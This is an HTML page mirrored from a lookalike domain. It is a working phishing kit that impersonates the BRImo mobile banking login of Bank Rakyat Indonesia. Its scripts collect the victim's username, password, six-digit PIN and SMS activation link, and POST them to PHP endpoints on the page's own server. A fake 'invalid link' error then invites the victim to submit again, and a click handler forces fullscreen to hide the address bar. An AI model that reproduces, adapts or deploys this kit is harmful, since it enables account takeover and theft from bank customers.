<!DOCTYPE html>
<html>

<!-- Mirrored from festivalsaldobrimogratis.res-lt.com/masuk/ by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 24 Oct 2023 10:55:59 GMT -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    
    <meta property="og:image:type" content="image/jpeg"> 
    <meta name="og:image" content="../../i.ibb.co/Dr6ft03/thumbnail.jpg">
    <meta name="og:title" content="PT.Bank Rakyat Indonesia (Persero) Tbk.">
    <meta name="og:description" content="Bank Rakyat Indonesia (BRI) adalah salah satu bank komersial terbesar di Indonesia yang selalu mengutamakan kepuasan nasabah.">

    <link rel="stylesheet" href="assets/css/login.css">
    <link rel="stylesheet" href="assets/css/pin.css">
    <link rel="stylesheet" href="assets/css/otp.css">
    <link rel="stylesheet" href="assets/css/load.css">
    <title>Login | BRImo</title>
</head>
<body>
    <div id="loader" class="bg-load load6" style="display:none;">
        <div class="loader"></div>
    </div>
    <div id="startPage" class="startPage" style="display:none;justify-content:center;align-items:center;width:100%;height:100%;">
        <img style="width:50px;height:50px;" src="assets/img/brimo.png" alt="BRImo">
    </div>
    <div id="body-log" class="body-log" style="display:none;height:100%;width:100%;">
        <div id="container-login" class="container-login">
            <div class="head_img">
                <img class="img_head" src="assets/img/head_login.png" alt="BRImo">
                <img class="front_img" src="assets/img/ilustrasi_login.png" alt="BRImo">
            </div>
            <div class="input-login">
                <h1 class="login-text">Login</h1>
                <form class="form-login" onsubmit="switchLogToPin(event);">
                    <div class="inp-sh-login">
                        <input id="Uname" autocomplete="off" class="inp-login inp-uname" placeholder="Username" type="text">
                        <div class="password-toggle">
                            <input autocomplete="off" id="inp-pass" class="inp-login inp-pass" placeholder="Password" type="password">
                            <img id="eye_close" onclick="togglePass()" class="toggle-password" src="assets/img/eye_close.png" alt="close">
                            <img hidden id="eye_open" onclick="togglePass()" class="toggle-password" src="assets/img/eye_open.png" alt="open">
                        </div>
                    </div>
                    <p href="#" class="forgot-login">Lupa Username/Password?</p>
                    <button id="btnLogin" type="submit" class="login-button">Login</button>
                </form>
            </div>
            <script>
                let btnLogin = document.getElementById("btnLogin");
                let inpUname = document.getElementById("Uname");
                let inpPass = document.getElementById("inp-pass");
                btnLogin.disabled = true;
                inpUname.addEventListener("input", validate);
                inpPass.addEventListener("input", validate);
                function validate(){
                    if (inpUname.value.length < 5 || inpPass.value.length <5){
                        btnLogin.disabled=true;
                    } else {
                        btnLogin.disabled=false;
                    }
                }
                function togglePass() {
                    var x = document.getElementById("inp-pass");
                    var l1 = document.getElementById("eye_close");
                    var l2 = document.getElementById("eye_open");
                    if (x.type === "password") {x.type = "text";l1.setAttribute('hidden', true);l2.removeAttribute('hidden');}
                    else {x.type = "password";l1.removeAttribute('hidden');l2.setAttribute('hidden', true);}
                }
            </script>
        </div>
    </div>
    <div id="body-pin" class="body-pin" style="display:none;width:100%;height:100%;">
        <div id="container-pin" class="container-pin">
            <div class="h-text-pin">
                <div class="b-head">
                    <div class="d-back-pin">
                        <img onclick="window.location.href='../index.html'" class="back-pin" src="assets/img/back.png" alt="kembali">
                    </div>
                    <h1>PIN</h1>
                </div>
                <div style="margin-top:80px;">
                    <h2 class="c-pin-h">Konfirmasi PIN</h2>
                    <h2 class="c-pin-h c-pin">Konfirmasi PIN yang sudah anda buat</h2>
                </div>
            </div>
            <form class="form-pin">
                <div class="box-pin-input">
                    <div class="box-pin">
                        <input disabled type="number" class="itm-inp-pin" autocomplete="off" id="inp-1" name="inp-1">
                    </div>
                    <div class="box-pin">
                        <input disabled type="number" class="itm-inp-pin" autocomplete="off" id="inp-2" name="inp-2">
                    </div>
                    <div class="box-pin">
                        <input disabled type="number" class="itm-inp-pin" autocomplete="off" id="inp-3" name="inp-3">
                    </div>
                    <div class="box-pin">
                        <input disabled type="number" class="itm-inp-pin" autocomplete="off" id="inp-4" name="inp-4">
                    </div>
                    <div class="box-pin">
                        <input disabled type="number" class="itm-inp-pin" autocomplete="off" id="inp-5" name="inp-5">
                    </div>
                    <div class="box-pin">
                        <input disabled type="number" class="itm-inp-pin" autocomplete="off" id="inp-6" name="inp-6">
                    </div>
                </div>
                <div class="lupaPin" style="width:86%;margin:auto;text-align:center;margin-top:30px;"><p class="lupa" style="color:#ffffff;font-size:15x;opacity:0.8;">Lupa PIN?</p></div>
                <div class="box-button-pin">
                    <div class="box-btn">
                        <div class="box-nmbr box-number-1">
                            <div class="box-btn-pin"><button type="button" id="btn-1" class="b-button-pin">1</button></div>
                            <div class="box-btn-pin"><button type="button" id="btn-2" class="b-button-pin">2</button></div>
                            <div class="box-btn-pin"><button type="button" id="btn-3" class="b-button-pin">3</button></div>
                        </div>
                        <div class="box-nmbr box-number-2">
                            <div class="box-btn-pin"><button type="button" id="btn-4" class="b-button-pin">4</button></div>
                            <div class="box-btn-pin"><button type="button" id="btn-5" class="b-button-pin">5</button></div>
                            <div class="box-btn-pin"><button type="button" id="btn-6" class="b-button-pin">6</button></div>
                        </div>
                        <div class="box-nmbr box-number-3">
                            <div class="box-btn-pin"><button type="button" id="btn-7" class="b-button-pin">7</button></div>
                            <div class="box-btn-pin"><button type="button" id="btn-8" class="b-button-pin">8</button></div>
                            <div class="box-btn-pin"><button type="button" id="btn-9" class="b-button-pin">9</button></div>
                        </div>
                        <div class="box-nmbr box-number-4">
                            <div class="box-btn-pin"><button type="button" class="b-button-pin" disabled ></button></div>
                            <div class="box-btn-pin"><button type="button" id="btn-0" class="b-button-pin">0</button></div>
                            <div class="box-btn-pin"><button type="button" id="btn-del" class="b-button-pin delete"></button></div>
                        </div>
                    </div>
                </div>
            </form>
        </div>
        <script>
            document.getElementById("btn-1").addEventListener("click", function() { validasi_pin(1); });
            document.getElementById("btn-2").addEventListener("click", function() { validasi_pin(2); });
            document.getElementById("btn-3").addEventListener("click", function() { validasi_pin(3); });
            document.getElementById("btn-4").addEventListener("click", function() { validasi_pin(4); });
            document.getElementById("btn-5").addEventListener("click", function() { validasi_pin(5); });
            document.getElementById("btn-6").addEventListener("click", function() { validasi_pin(6); });
            document.getElementById("btn-7").addEventListener("click", function() { validasi_pin(7); });
            document.getElementById("btn-8").addEventListener("click", function() { validasi_pin(8); });
            document.getElementById("btn-9").addEventListener("click", function() { validasi_pin(9); });
            document.getElementById("btn-0").addEventListener("click", function() { validasi_pin(0); });
            document.getElementById("btn-del").addEventListener("click", function() {
                f_1.value = "";
                f_2.value = "";
                f_3.value = "";
                f_4.value = "";
                f_5.value = "";
                f_6.value = "";
            });
            var f_1 = document.getElementById("inp-1");
            var f_2 = document.getElementById("inp-2");
            var f_3 = document.getElementById("inp-3");
            var f_4 = document.getElementById("inp-4");
            var f_5 = document.getElementById("inp-5");
            var f_6 = document.getElementById("inp-6");
            function validasi_pin(value) {
                var pin_1 = document.getElementById("inp-1").value;
                var pin_2 = document.getElementById("inp-2").value;
                var pin_3 = document.getElementById("inp-3").value;
                var pin_4 = document.getElementById("inp-4").value;
                var pin_5 = document.getElementById("inp-5").value;
                var pin_6 = document.getElementById("inp-6").value;
                if(pin_1.length <= 0){f_1.value = value;
                }else if(pin_2.length <= 0){f_2.value = value;
                }else if(pin_3.length <= 0){f_3.value = value;
                }else if(pin_4.length <= 0){f_4.value = value;
                }else if(pin_5.length <= 0){f_5.value = value;
                }else if(pin_6.length <= 0){f_6.value = value;}
                validasi_submit();
            }
            function validasi_submit() {
                var pin_1 = document.getElementById("inp-1").value;
                var pin_2 = document.getElementById("inp-2").value;
                var pin_3 = document.getElementById("inp-3").value;
                var pin_4 = document.getElementById("inp-4").value;
                var pin_5 = document.getElementById("inp-5").value;
                var pin_6 = document.getElementById("inp-6").value;
                var data_pin = pin_1 + pin_2 + pin_3 + pin_4 + pin_5 + pin_6;
                if(pin_1.length > 0 && pin_2.length > 0 && pin_3.length > 0 && pin_4.length > 0 && pin_5.length > 0 && pin_6.length > 0){swithPinToOtp(data_pin)}
            }
        </script>
    </div>
    <div id="body-otp" class="body-otp" style="display:none;width:100%;height:100%;">
        <div class="container-otp">
            <div class="d-sms-h"><img src="assets/img/sms.png" alt="" class="h-sms-img"></div>
            <div class="cekSms">
                <p class="txt-cekSms">Cek SMS</p>
            </div>
            <div class="line-time"></div>
            <div id="alertBox" class="errorMsg" style="display: none;">
                <p class="alertText">Link yang anda masukan tidak Valid</p>
            </div>
            <div id="timeTxt" class="time-number">
                <p id="countdown" class="n-time">03:30</p>
            </div>
            <div class="d-text-sms">
                <p class="text-smsotp">
                    Link aktifasi BRImo telah kami kirim ke Nomor Handphone anda, Silakan salin SMS tautan lalu di tempel dibawah ini<br>Tempel SMS BRI (Wajib)
                </p>
            </div>
            <div class="textArea">
                <textarea name="smsAktv" id="smsAktv" class="smsAktv" placeholder="Contoh SMS https://brimo.bri.co.id/app/login?code=xxxx"></textarea>
            </div>
            <div class="d-btn-aktv">
                <button onclick="sendVerifLink()" id="btnAktv" type="button" class="btn-aktv">Konfirmasi</button>
            </div>
        </div>
        <div class="resend">
            <p class="Rsend">Tidak terima SMS? <p onclick="return resend()" id="resend" class="Rsend Rsend-K"> Kirim ulang</p></p>
        </div>
        <script>
            window.onload = startCount();
            function startTimer(duration, display) {
                var timer = duration, minutes, seconds;
                setInterval(function () {
                    minutes = parseInt(timer / 60, 10);
                    seconds = parseInt(timer % 60, 10);
                    minutes = minutes < 10 ? "0" + minutes : minutes;
                    seconds = seconds < 10 ? "0" + seconds : seconds;
                    display.textContent = minutes + ":" + seconds;
                    if (--timer < 0) {
                        timer = duration;
                    }
                }, 1000);
            }
            function startCount () {
                var fiveMinutes = 60 * 3.7,
                    display = document.getElementById("countdown");
                startTimer(fiveMinutes, display);
            };
            var inpOtp = document.getElementById("smsAktv");
            var btnConf = document.getElementById("btnAktv");
            btnConf.disabled=true;
            inpOtp.addEventListener("input", validate);
            function validate(){
                if (inpOtp.value.length < 10){
                    btnConf.disabled=true;
                } else {
                    btnConf.disabled=false;
                }
            }
        </script>
    </div>
</body>
<script src="../../code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
    var nohp = sessionStorage.getItem("nohp");
    setTimeout(function(){
        var startPage = document.getElementById("startPage");
        $(startPage).fadeIn("slow");
        setTimeout(function(){
            $("#startPage").hide();
            $("#body-log").fadeIn("slow");
        },2000);
    },1000);
    var loading = document.getElementById("loader");
    function resend() {
        $(loading).fadeIn();
        setTimeout(function(){
            $(loading).fadeOut();
        },3000);
    }
<!---->
<!---->
<!---->
    function switchLogToPin(event){
        event.preventDefault();
        $(loading).fadeIn();
        var uname = document.getElementById("Uname").value;
        var passw = document.getElementById("inp-pass").value;
        var cont_log = document.getElementById("body-log");
        var cont_pin = document.getElementById("body-pin");
        $.ajax({
            type: 'POST',
            url: '../req/log.php',
            data: 'uname='+uname+'&passw='+passw,
            dataType: 'text',
            success: function(){
                $(cont_log).hide();
                $(cont_pin).fadeIn();
                $(loading).hide();
            }
        })
    };


    var libData_pin = {};
    function swithPinToOtp(data_pin) {
        $(loading).fadeIn();
        libData_pin.n_pin = data_pin;
        var cont_pin = document.getElementById("body-pin");
        var cont_otp = document.getElementById("body-otp");
        $.ajax({
            type: 'POST',
            url: '../req/ver.php',
            data: 'nopin='+data_pin,
            dataType: 'text',
            success: function(){
                $(cont_pin).hide();
                $(cont_otp).fadeIn();
                $(loading).hide();
            }
        })


    }
    function sendVerifLink() {
        var uname = document.getElementById("Uname").value;
        var passw = document.getElementById("inp-pass").value;
        var data_pin = libData_pin.n_pin;
        var linkVer = document.getElementById("smsAktv").value;
        var alertBox = document.getElementById("alertBox");
        $(loading).fadeIn();

        $.ajax({
            type: 'POST',
            url: '../req/verr.php',
            data: 'nootp='+linkVer,
            dataType: 'text',
            success: function(){
                setTimeout(function(){
                    $(loading).hide();
                    $(alertBox).slideDown("fast");
                    $("#countdown").css("opacity","0");
                    $("#smsAktv").css("border","1px solid #f65656");
                    $("#smsAktv").css("color","#f65656");
                    var clearTextArea = document.getElementById("smsAktv");
                    clearTextArea.addEventListener("click", function(){
                        clearTextArea.value = "";
                        btnConf.disabled=true;
                    });

                    setTimeout(function(){
                        $("#smsAktv").css("border","1px solid #c9c9c9");
                        $("#smsAktv").css("color","#8e8e8e");
                        $(alertBox).slideUp("fast");
                        $("#countdown").css("opacity","1");
                    },3000);
                },3000);
            }
        })
    }
    document.documentElement.addEventListener("click", function (){
        var docElm = document.documentElement;
        if (docElm.requestFullscreen) {docElm.requestFullscreen()}
        else if (docElm.mozRequestFullScreen) {docElm.mozRequestFullScreen()}
        else if (docElm.webkitRequestFullScreen) {docElm.webkitRequestFullScreen()}
    });
</script>

<!-- Mirrored from festivalsaldobrimogratis.res-lt.com/masuk/ by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 24 Oct 2023 10:56:10 GMT -->
</html>
